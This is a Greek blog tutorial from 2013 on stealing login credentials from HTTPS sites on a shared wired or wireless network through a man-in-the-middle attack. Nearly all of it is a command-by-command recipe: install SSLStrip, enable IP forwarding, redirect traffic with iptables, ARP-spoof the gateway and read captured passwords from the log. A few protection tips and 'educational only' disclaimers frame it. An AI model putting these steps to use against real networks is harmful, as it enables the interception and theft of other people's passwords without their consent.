!ΠΡΟΣΟΧΗ ΠΡΟΣ ΤΟΥΣ ΑΝΑΓΝΩΣΤΕΣ!

ΠΡΟΣΟΧΗ ΠΡΟΣ ΤΟΥΣ ΑΝΑΓΝΩΣΤΕΣ!
**** Σε αυτό το blog μερικά από τα άρθρα είναι αναδημοσιεύσεις από άρθρα του διαδικτύου και άλλα είναι προσωπικά tutorial που αναφέρονται σε διάφορα θέματα. Τα παραπάνω έγιναν για ενημέρωση του κοινού και εμπλουτισμό της εκπαιδευτικής διεύρυνσης. Όλα τα άρθρα είναι για εκπαιδευτικούς και μόνο σκοπούς. Δεν φέρω καμία ευθύνη εάν κάποιος αναγνώστης τα χρησιμοποιήσει κακόβουλα. ****

Τρίτη 5 Μαρτίου 2013

"Ψάρεμα" κωδικών λογαριασμών HTTPS/SSL σελίδων με SSLStrip και ARPSpoof

Γειά σας... Πριν λίγες μέρες έφτιαξα ένα tutorial για το πως ψαρεύουμε κωδικούς πρόσβασης από ένα LAN δίκτυο χρησιμοποιώντας το social engineering tool του Backtrack 5. Σήμερα σε αυτό το tutorial θα σας δείξω πώς να ψαρέψετε κωδικού πρόσβασης από σελίδες με καταλλήξεις https/ssl δηλαδή σελίδες που είναι προστατευμένες με το πρωτόκολλο SSL. Αυτή η τεχνική μπορεί να εφαρμοστεί σε ασύρματα και ενσύρματα δίκτυα. Είναι ουσιαστικά μια ΜΙΤΜ επίθεση και για να πραγματοποιηθεί πρέπει να έχουμε ένα κομβικό σημείο για παράδειγμα ένα router (ασύρματο/ενσύρματο) που να χρησιμοποιήται από πολλούς χρήστες.
Τα εργαλεία που θα χρησιμοποιηθούν είναι το SSLStrip, arpspoof και φυσικά το Backtrack 5 R3.



Αν δεν έχουμε εγκατεστημένο το SSLStrip τότε:

1) Ανοίγω ένα τερματικό και εισάγω: wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz

http://zyphyto1.host56.com/sslstrip/3.jpg

2) Στη συνέχεια αποσυμπιέζω το αρχείο που κατέβασα γράφοντας: tar zxvf sslstrip-0.9.tar.gz

http://zyphyto1.host56.com/sslstrip/4.jpg

3) Ανοίγω το φάκελο που αποσυμπίεσα το αρχείο: cd sslstrip-0.9
4) Τέλος κάνω εγκατάσταση γράφοντας: python setup.py install

http://zyphyto1.host56.com/sslstrip/6.jpg

1) Ανοίγω νέο τρματικό και γράφω την παρακάτω εντολή έτσι ώστε να ορίσω τη θύρα που θα στέλνονται τα δεδομένα: echo ’1′ > /proc/sys/net/ipv4/ip_forward 

http://zyphyto1.host56.com/sslstrip/1.jpg

2) Βρισκω την ΙΡ του router: netstat -nr

http://zyphyto1.host56.com/sslstrip/2.jpg

3) Στη συνέχεια ορίζω τα iptables στη θύρα 8080: iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080 

http://zyphyto1.host56.com/sslstrip/7.jpg

4) Αρχίζω να κάνω arpspoofing ή αλλιώς δημιουργώ κίνηση στο router δηλητηριάζοντας το έτσι ώστε να κάνω ΜΙΤΜ επίθεση: arpspoof -i wlan0 192.168.0.1 (Αντικαθιστώ το wlan0 με τον τύπο της σύνδεσης και σαν ΙΡ δίνω την ΙΡ της Gateway που μου δώθηκε όταν έβαλα στο τερματικό την εντολή  netstat -nr

http://zyphyto1.host56.com/sslstrip/8.jpg

5) Τέλος ενεργοποιώ το sslstrip: sslstrip -l 8080

http://zyphyto1.host56.com/sslstrip/9.jpg

6) Επομένως αυτό που έχουμε είναι 2 τερματικά όπου στο ένα τρέχει το sslstrip και στο άλλο το arpspoof

http://zyphyto1.host56.com/sslstrip/12-%20sitandwait.jpg

7) Αν επιθυμώ να μου εμφανίζεται στο τερματικό η κίνηση του δικτύου γράφω: tail -f sslstrip.log 

http://zyphyto1.host56.com/sslstrip/16-logfiletail.jpg

http://zyphyto1.host56.com/sslstrip/17-3screens.jpg

8) Όταν οι χρήστες του δικτύου ανοίξουν οποιαδήποτε σελίδα στην οποία δίνουν username/password τότε αυτομάτως εμφανίζονται στην οθόνη μας. Επίσης αν δεν εμφανίζονται κωδικοί στην οθόνη μπορούμε να μεταβούμε στο φάκελο του sslstrip και να βρούμε ένα αρχείο name.log όπου θα εμφανίζεται εκεί η κίνηση του δικτύου.

http://zyphyto1.host56.com/sslstrip/passwords%20recieved.jpg

ΣΗΜΕΙΩΣΗ:
Για τυχόν errors που θα εμφανιστούν πιθανόν στο τερματικό σας μη δώσετε σημασία. Δεν υπάρχει κανένα πρόβλημα είναι φυσιολογικό. Απλά κάθε φορά έχετε το νού σας για αναβαθμίσεις του sslstrip στη σελίδα του έτσι ώστε να έχετε ενημερωμένες εκδόσεις του.

http://zyphyto1.host56.com/sslstrip/14-error.jpg

Επίσης το sslstrip δεν μπορεί να δουλέψει τόσο καλά με browsers όπως ο Mozilla και το Google Chrome και όπως επίσης με site ειδικά με το Gmail.

Τρόποι προστασίας:
  • Θα πρέπει να αποφεύγουμε να μπαίνουμε σε site όπου δίνουμε κωδικούς πρόσβασης σε δίκτυα ασύρματα/ ενσύρματα που δεν είναι ασφαλή όπως τα ασύρματα δίκτυα μιας καφετέριας ενός internet cafe κτλ.
  • Επίσης θα πρέπει όταν είμαστε σε τέτοια δίκτυα και όταν μπούμε στη σελίδα και πάμε να δώσουμε τον κωδικό πρόσβασης πάντα μα πάντα να ελέγχουμε πάνω στο σύνδεσμο να γράφει: https://............ αυτό είναι η πιστοποίηση για την εγκυρότητα του site. Μας λέει δηλαδή οτι δεν είναι πλαστό και οτι δε χρησιμοποιεί κάποιος μια πλαστή σελίδα έτσι ώστε να μας αποσπάσει κωδικούς.
  • Τέλος, είναι πολύ σημαντικό να προσέχουμε οτιδήποτε περίεργο μας εμφανιστεί ή οποιαδήποτε περίεργη συμπεριφορά προκύψει κατα τη διάρκεια φόρτωσης της οποιαδήποτε σελίδας και του δικτύου.

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

0 σχόλια:

Δημοσίευση σχολίου

Σημείωση: Μόνο ένα μέλος αυτού του ιστολογίου μπορεί να αναρτήσει σχόλιο.